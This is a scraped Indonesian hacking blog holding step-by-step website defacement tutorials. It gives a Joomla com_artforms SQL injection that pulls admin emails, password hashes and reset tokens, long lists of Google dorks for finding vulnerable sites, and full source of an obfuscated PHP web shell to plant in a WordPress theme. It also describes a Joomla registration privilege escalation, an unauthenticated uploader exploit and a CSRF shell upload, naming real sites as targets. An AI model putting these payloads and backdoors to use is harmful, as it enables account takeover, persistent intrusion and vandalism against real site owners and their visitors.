//Configure below to change URL path to the snow image var snowsrc="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH3KsqATEn3NpKy0jpPpLjyQPJahGm2JEhV7YbS2VDKjBzdQkAzmqM_J0v8DCIwuZ-HihwYDaLN8wPuLHnrT7I5T6vONsRKKRr6w7m76FEBDRJH80u2PJM0wGpB8XkanXYJOatVGmF0l0/s400/snow.gif" // Configure below to change number of snow to render var no = 15; // Configure whether snow should disappear after x seconds (0=never): var hidesnowtime = 0; // Configure how much snow should drop down before fading ("windowheight" or "pageheight") var snowdistance = "pageheight"; ///////////Stop Config////////////////////////////////// var ie4up = (document.all) ? 1 : 0; var ns6up = (document.getElementById&&!document.all) ? 1 : 0; function iecompattest(){ return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body } var dx, xp, yp; // coordinate and position variables var am, stx, sty; // amplitude and step variables var i, doc_width = 800, doc_height = 600; if (ns6up) { doc_width = self.innerWidth; doc_height = self.innerHeight; } else if (ie4up) { doc_width = iecompattest().clientWidth; doc_height = iecompattest().clientHeight; } dx = new Array(); xp = new Array(); yp = new Array(); am = new Array(); stx = new Array(); sty = new Array(); snowsrc=(snowsrc.indexOf("dynamicdrive.com")!=-1)? "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH3KsqATEn3NpKy0jpPpLjyQPJahGm2JEhV7YbS2VDKjBzdQkAzmqM_J0v8DCIwuZ-HihwYDaLN8wPuLHnrT7I5T6vONsRKKRr6w7m76FEBDRJH80u2PJM0wGpB8XkanXYJOatVGmF0l0/s400/snow.gif" : snowsrc for (i = 0; i < no; ++ i) { dx[i] = 0; // set coordinate variables xp[i] = Math.random()*(doc_width-50); // set position variables yp[i] = Math.random()*doc_height; am[i] = Math.random()*20; // set amplitude variables stx[i] = 0.02 + Math.random()/10; // set step variables sty[i] = 0.7 + Math.random(); // set step variables if (ie4up||ns6up) { if (i == 0) { document.write("

Salam Satu Komando

Salam Satu Komando

Salam Bhineika Tunggal Ika

Cari Blog Ini

Sabtu, 05 April 2014

Cara Deface Web Dengan Exploit Com ArtForms

 
             Kali ini saya akan membahas tentang exploit joomla com_artforms. Dengan exploit ini, kita akan melakukan reset password sebuah web berbasis joomla. Dan tentunya dengan reset password inilah, kita bisa masuk ke web tersebut sebagai admin dan menanamkan shel/backdoor. Bagaimana caranya? Simak baik - baik.






1. Ketik dork ini ke google : inurl:"option com_artforms"

2. Pilih salah 1 web untuk dijadikan target

3. Masukkan exploit ini : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
Contoh : www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

4. Nanti anda akan melihat email dari web tersebut. Copy email tersebut ke notepad.

5. Sekarang anda masuk ke tempat reset password dengan buka tab baru, lalu masukkan kode ini /index.php?option=com_user&view=reset
Contoh : www.site.com/index.php?option=com_user&view=reset

6. Sebelum reset password, anda akan disuruh memasukkan email. Nah, masukkan email yang tadi anda copy ke notepad. Lalu klik "submit"

7. Selanjutnya, anda akan disuruh memasukkan token. Nah anda buka tab baru dan masukkan exploit ini : index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
Contoh : www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

8. Nanti akan muncul kode aktivasi/token seperti ini admineda7d6142fac40a533b56407a4617371. Yang berwarna merah adalah username webnya, sedangkan yang kuning adalah tokennya. Anda masukkan token tersebut pada form memasukkan token yang tadi. Klik enter.

9. Kini form untuk mereset password sudah muncul, nah masukkan password yang anda inginkan untuk masuk ke web tersebut sebagai admin. Misal : androidnymous

10. Jika berhasil, anda masuk deh ke panel adminnya : www.site.com/administrator

11. Masukkan username yang tadi ditemukan dan password yang sudah anda reset.
Contoh : username = admin, password = androidnymous

12. Dan kini anda berhasil masuk sebagai admin. Saatnya mulai menanam shell anda

Jumat, 04 April 2014

Kumpulan Google Dork COM_USER Lengkap | New 2014

Hallo Mbloo :v
Pasti ente buka post ini pengen nyari google dork Com_User yeh ??
Ngaku ajaaa :v

Oke Deh , Nih Ane Kasih Koleksi Dork ane :v
Eiiittsss , Titip nick dulu : ./Bl4nk'0n44
Oke Sip
Nihh :

intext:Usar un nombre de usuario y contrasena valido para poder tener acceso a la Administracion.. Joomla!R es software libre distribuido bajo la licencia GNU/GPL. Pack creado por Joomla!Spanish - 2011 - Hosting Joomla Spanish Webempresa inurl:index.php?option

intitle:home page beez joomla 1.6 inurl:com/joomla

intitle:home page beez 2 inurl:com/joomla

intitle:home page beez 5 inurl:com/joomla

intitle:home page atomic inurl:com/joomla

intext:Joomla!R -áecïëaòíoe ïpoãpaììíoe
oáecïe÷eíèe, pacïpocòpaíÿeìoe
ïo ëèöeíçèè GNU General Public
License
Ëoêaëèçaöèÿ: Ïopòaë Joomla! ïo- pyccêè. Texíè÷ecêaÿ ïoääepæêa:
Ôopyì pyccêoé ïoääepæêè
Joomla! CMS inurl:/administrator

intext:Veuillez utiliser un
identifiant et un mot de passe
valides pour acceder a
l'administration. site:it

intext:Bâeäèòe
cyùecòâyþùèe ëoãèí è ïapoëü
äocòyïa ê Ïaíeëè yïpaâëeíèÿ.
site:ru

inurl:/administrator/
index.php intext:Use a valid
username and password to gain
access to the administrator
backend. Joomla!R is free software
released under the GNU General Public License.

intitle:joomla! intext:joomla! is a flexible and powerful platform,
whether you are building a small
site for yourself or a huge site
with hundreds of thousands of
visitors site:com

inurl:index.php/using-joomla/
extensions/components/users-
component/registration-form Quote:inurl:index.php/using-joomla/
extensions/plugins site:.com Quote:inurl:index.php/using/joomla
site:com 

inurl:index.php/using-joomla/
extensions/components/content-
component/article-category-
list/50-upgraders 

inurl:index.php/using-joomla/
extensions/components/content-
component/article-categories/28-
park-site/photo-gallery 

inurl:index.php/using-joomla/
parameters/26-sample-data-
articles/park-site 

inurl:index.php/plugins
site:com

Inurl:index.php/rss=feed
site:com 

inurl:index.php/joomla/
content/category-blog/24-joomla
site:com 

inurl:index.php/using-joomla/
extensions/components/content-
component/article-categories/84-
gd-articles site:.com 

inurl:Home Page Beez joomla
1.6 index.php using-joomla Quote:inurl:index.php joomla! 1.7 -
open source content management
site:com

inurl:index.php/using-joomla/
extension/components/content-
component/article-category-
list/50-upgraders site:com

intext:joomla! 1.7 - open
source content management site:jp Quote:inurl:index.php/19-sample-
data-articles/joomla/50-upgraders
site:.com 

inurl:index.php/using-joomla/
extensions/templates/beez-2/
home-page-beez-2 site:as 

inurl:index.php/19-sample-
data-articles/joomla site:com 

inurl:Home Page Beez5
joomla 1.6 index.php/using-joomla/
extensions/components/users-
component/registration-form
site:com 

intext:"joomla! 1.7 - Open
Source Content Management"
inurl:sites-guide.co.vn Quote:intext:"joomla! 1.7 - Open
Source Content Management"
inurl:statscrop+gov 

inurl:statscrop+gov Quote:intext:"joomla! 1.7 - Open
Source Content Management"

inurl:statmyweb+gov Quote:intext:"joomla! 1.6 - Open
Source Content Management"

inurl:statmyweb+gov Quote:intext:"joomla! 1.6 - Open
Source Content Management"

inurl:gov rank Quote:intext:Joomla! is the mobile-
ready and user-friendly way to
build your website. Choose from
thousands of features and designs.
Joomla! is free and open source. Quote:intext:The Joomla! name is
used under a limited license from
Open Source Matters in the United
States and other
countries.JoomlaShine.com is not
affiliated with or endorsed by Open Source Matters or the Joomla!
Project.

intext:Joomla! 1.7A continues
development of the Joomla
Framework and CMS as a powerful
and flexible way to bring your vision
of the web to reality

intext:Joomla!
Spanish.Gestor de Contenido Open
Source 2.5 inurl:com/joomla

inurl:index.php/using-joomla/extensions/plugins site:.com

inurl:index.php/using/joomla site:com

inurl:index.php/using-joomla/extensions/components/content-component/article-category-list/50-upgraders

inurl:index.php/using-joomla/extensions/components/content-component/article-categories/28-park-site/photo-gallery

inurl:index.php/using-joomla/parameters/26-sample-data-articles/park-site

inurl:index.php/plugins site:com

inurl:index.php/rss=feed site:com

inurl:index.php/joomla/content/category-blog/24-joomla site:com

inurl:index.php/using-joomla/extensions/components/content-component/article-categories/84-gd-articles site:

inurl:Home Page Beez joomla 1.6 index.php using-joomla

inurl:index.php joomla! 1.7 - open source content management site:

inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com intext:joomla! 1.7 - open source content management site:jp

inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as

inurl:index.php/19-sample-data-articles/joomla site:com


inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br site:com

Dork Dikembangin Lagi >.<
Udah tuh segitu aja :3 Yang Sabar ya cari site Vulnya :v

sumber ;  http://blank-on44.blogspot.com/

Cara Mengupload Shell di Wordpress

WordPress adalah sebuah aplikasi sumber terbuka (open source) yang sangat populer digunakan sebagai mesin blog (blog engine). WordPress dibangun dengan bahasa pemrograman PHP dan basis data (database) MySQL. PHP dan MySQL, keduanya merupakan perangkat lunak sumber terbuka (open source software). Selain sebagai blog, WordPress juga mulai digunakan sebagai sebuah CMS (Content Management System) karena kemampuannya untuk dimodifikasi dan disesuaikan dengan kebutuhan penggunanya.



Sementara Backdoor atau "pintu belakang", dalam keamanan sistem komputer, merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).  ( Dikutip dari Wikipedia.Org )

* Bantu saya untuk mengembangkan blog ini menjadi lebih baik dengan mengklik Google Adsense atau Iklan yang ada di atas posting, dan atau disebelah kiri atas posting. 1 klik sangat berharga bagi saya dan bernilai $0.01 - $1 per kliknya.

Cara Mengupload Shell ( Backdoor ) di Wordpress:

1. Login ke Dashboard Wordpress

Gambar 1: Dashboard Wordpress

2. Klik Appearance

Gambar 2: Dashboard Wordpress

3. Klik Themes
Gambar 3: Appearance

4. Klik Editor


Gambar 4: Themes Editor

5. Klik 404 Template atau 404.php
* Jika tidak ada 404 Template atau 404.php, anda bisa menggunakan Comments atau comments.php atau juga yang lainnya.

Gambar 5: Themes Editor
6. Ganti script 404.php dengan script shell ( Backdoor ) anda, jika anda belum punya script backdoor copy aja script dibawah ini lalu klik tombol Update File.


<?php
/* (1n73ction shell v3.2 by x'1n73ct|default pass:" 12345 ") */ 
$auth_pass = "827ccb0eea8a706c4c34a16891f84e7b"; 
$color = "#00ff00"; 
$default_action = 'FilesMan'; 
@define('SELF_PATH', __FILE__); 
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { 
    header('HTTP/1.0 404 Not Found'); 
    exit; 
@session_start(); 
@error_reporting(0); 
@ini_set('error_log',NULL); 
@ini_set('log_errors',0); 
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0); 
@ini_set('display_errors', 0);
@set_time_limit(0); 
@set_magic_quotes_runtime(0); 
@define('VERSION', '2.1'); 
if( get_magic_quotes_gpc() ) { 
    function stripslashes_array($array) { 
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); 
    } 
    $_POST = stripslashes_array($_POST); 
function printLogin() { 
    ?> 
<h1>Not Found</h1> 
<p>The requested URL was not found on this server.</p> 
<hr> 
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address> 
    <style> 
        input { margin:0;background-color:#fff;border:1px solid #fff; } 
    </style> 
    <center> 
    <form method=post> 
    <input type=password name=pass> 
    </form></center> 
    <?php 
    exit; 
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) 
    if( empty( $auth_pass ) || 
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) 
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; 
    else 
        printLogin();
    @ini_set('output_buffering',0); 
@ini_set('display_errors', 0);
function x($inject){eval("\$z=gz" . "inf" . "la" . "te(s" . "t" . "r_r" . "ot" . "13(ba" . "se" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "de(st" . "r" . "_" . "r" . "o" . "t" . "13(" . "gzi" . "nf" . "lat" . "e(" . "bas" . "e6" . "4_d" . "ec" . "ode(\$inject))))));eval(\$z);");}
x("DczdFkIwAADgB3Kx4+f4uehiJyJFM0bcjYPKqGbFPH19D/Adch2iLn+Qan8XlupmvkrlMEVX3NtyDS2gc9nTGF4X0yHDKSAFnPHHOkwhFNw5v0XIqMdyAylyc5r0ReRkzlhmX8y5Fizfz5rpiQsaz7jdWXZDUbJdcN2KqfRPLWnrJ6t88P9SpB5TNIws6KCxxSXvo3EugK2kQKNA2M66mLG72/0A");
?>
Gambar 6: Masuk ke Shell

7. Setelah selesai mengedit script 404.php, lalu panggil shell nya seperti dibawah ini:

http://targetmu.com/wp-content/themes/nama themes/404.php


Lihat pada Gambar 6, jika nama themesnya twentyfourteen. Berarti kita panggil shellnya seperti di bawah ini:
http://targetmu.com/wp-content/themes/twentyfourteen/404.php


Gambar 7: Shell

8. Masukan password shell. "Jika anda menggunakan password"
jika anda menggunakan shell yang saya berikan tadi, berarti password shellnya adalah scupeid .


Gambar 8: Sukses
9. Jika anda berhasil menanamkan shell di blog wordpress, maka akan ada tampilan seperti gambar diatas (" Jika menggunakan Shell 1n73ction")

Cara Deface Web dengan Exploit Joomla | Inspect Element |

Halo defacer Indonesia, kali ini saya akan memberi tahu anda cara mendeface web cms joomla dengan Exploit Joomla | Inspect Element. Sebenarnya, teknik ini baru saya pelajari. Dan ternyata, Teknik ini lebih mudah dibanding teknik Exploit Joomla (Com_User). Dan tutorial ini, intinya sama dengan tutorial Com_User.


Gunakan Browser Google Chrome agar lebih mudah.

*Tutorial ini dibuat menggunakan Browser Google Chrome
Langkah-Langkah:
1. Cari target secara Random dengan menggunakan Google Dork ini:

atau anda bisa membaca tutorial: Google Dork Com_User

intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it
(atau)
intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
(atau)
intext:Введите существующие логин и пароль доступа к Панели управления. site:ru

Penjelasan:
*site: boleh diganti dengan ca/ it/ za/ id/ ru dll ( sesuai keinginan anda )

intitle: berarti, kata yang terkandung dalam judul sebuah Web.
intext: berarti, kata yang terkandung didalam web tersebut.
site: berarti, domain yang digunakan oleh web tersebut. ca=Canada ru=Russia dan sebagainya.

*Google Dork kembangkan sendiri agar mendapat hasil yang lebih maksimal.


Gambar 1: Target

2. Setelah mendapatkan target. langkah selanjutnya adalah pergi ke halaman Registrasi Web tersebut dengan menambahkan: index.php?option=com_users&view=registration
Disini target saya adalah www.jimseasytennis.com.au
Jadi saya harus pergi ke: www.jimseasytennis.com.au/index.php?option=com_users&view=registration

Gambar 2: Halaman Registrasi Web
3. Lalu anda akan melihat tampilan halaman registrasi sebuah web CMS Joomla seperti Gambar 2 diatas. 

Gambar 3: Memasukan Nama, Username, Password, Email.


4. Isikan Halaman yang kosong ( Nama, Username, Password, Email )
* Untuk bagian password, isikan Password dan Confirm Password secara berbeda.

Contoh:
Password: anonymous

Confirm Password: hacked


Gambar 4: Inspect Element

5. Klik pada kotak email ke 2 ( Confirm Email Address ) -> Klik Kanan pada mouse -> Inspect Element / Periksa Element

Gambar 5: Edit HTML

6. Setelah menyelesaikan langkah ke 5, maka akan muncul Tapmpilan seperti Gambar 5. Lalu klik kanan pada kode HTML <dd> lalu klik tulisan Edit As Html.

Gambar 6: Edit HTML

Gambar 7: Edit HTML
7. Setelah itu, masukkan kode EXPLOIT ini di bagian paling bawah setelah kode HTML yang ada di Gambar 6. Dan hasilnya seperti pada gambar 7.

<dd><input value="7" name="jform[groups][]" /></ dd>

* Value 7 menunjukan kita berada di Administrator Grup bukan di Super User grup yang ada di Value 8.

8. Klik Register

Gambar 8: Mengisi Kotak Password

9. Setelah ada pemberitahuan Password yang anda masukkan tidak cocok seperti Gambar 8. Langkah selanjutnya adalah Mengisi kembali pada kotak Password dengan password anda.
Contoh:
Password: Hacked
Confirm Password: Hacked

Gambar 9: Registrasi Sukses

10. Setelah registrasi sukses seperti Gambar 9 lalu pergi ke Email anda lalu klik Kode Aktivasi yang diberikan oleh web tersebut.
*Jika alamat aktivasi web tersebut tidak masuk ke inbox, maka anda bisa melihatnya di bagian spam.

Gambar 10: Login sebagai Administrator

11. Setelah mengklik kode validasi, lalu pergi ke halaman administrator web tersebut dengan menambahkan /administrator di belakang alamat web tersebut.
Contoh: 
alamat web: www.jimseasytennis.com.au
Halaman Administrator: 
http://www.jimseasytennis.com.au/administrator

Gambar 11: Sukses

12. Sukses
13. Setelah masuk ke halaman Administrator, langkah terakhir adalah dengan menebas indexnya.

Exploit CMS Lanang Mulia Uploader Vulnerability

Simple Aja ya :v


Exploit Title: Lanang Mulia Uploader Vulnerability

Google Dork:
intext:" Web By: lanangmulia.net"
inurl:showdetail.php?mod=


Untuk dork lain kembangkan sendiri, use your brain ;)

Exploit :


[localhost]/admin/upload_1.php

Jika belum di patch, disitu kalian bisa langsung upload shell kalian tanpa harus tamper data maupun login :v
Nah, nanti shell akan terletak di

[localhost]/foto/namashell.php

Thanks For All

Thanks to : BarrabravaZ

Deface Dengan CSRF (Cross Site Request Forgery)

Assalamualaikum :)
Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D

Bahan-Bahan:

1. Download Script CSRF
===============================================================
DOWNLOAD DISINI  Password: Lihat
===============================================================
Note: Aktifkan Java Script untuk download!!

2. Download MadspotShell Disini Extract dulu dari file Rar!

3. Cari target dengan DORK :

  • inurl:/wp-content/themes/shepard
  • inurl:/wp-content/themes/money
  • inurl:/wp-content/themes/clockstone
  • inurl:/wp-content/themes/ambleside
  • inurl:/wp-content/themes/pacifico
#Dork dikembangkan sendiri ya :)

4. Untuk coba2 gunakan Live Target & Live Target 2

5. Great Thanks To om Edo aka Mr. Goodday aka 007 Yg udh ngajarin :D

6. Titip Nama :: Indonesian Cyber Army ( IDCA ) | Stealth Defacer Hacking Team (SDHT)
#Persiapan sudah selesai, sekarang tinggal kita eksekusi :)

7. Download Video Tutorial | Pass : onixidca


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah- Langkah:

1. Masukan Dork ke dalam google (kurang jelas lihat gambar)

2. Pilih salah satu target yang kita dapat tadi (Kurang jelas lihat gambar)
Contoh :
http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadi http://www.robertcarpentry.com/wp-content/themes/pacifico/theme

3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"
Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p  "Jika muncul "error" berarti Web target Vulnerable" ;p
4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET  dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!
Contoh: "http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"
5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .
Jika berhasil maka akan muncul seperti ini (lihat gambar)
6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini
#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)

#Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)
Tampilan madspotshell::
7. Untuk eksekusi Index, silahkan lihat Cara Tebas Index Website Wordpress

Sekian tutor yang dapat saya berikan :)

kalo kurang jelas, boleh tanya kan pada ORANG CAKEP INI XD

Sekian :)
Keyword : Cara deface dengan CSRF , Deface Website Mudah , Cara deface website , Cara ampuh deface website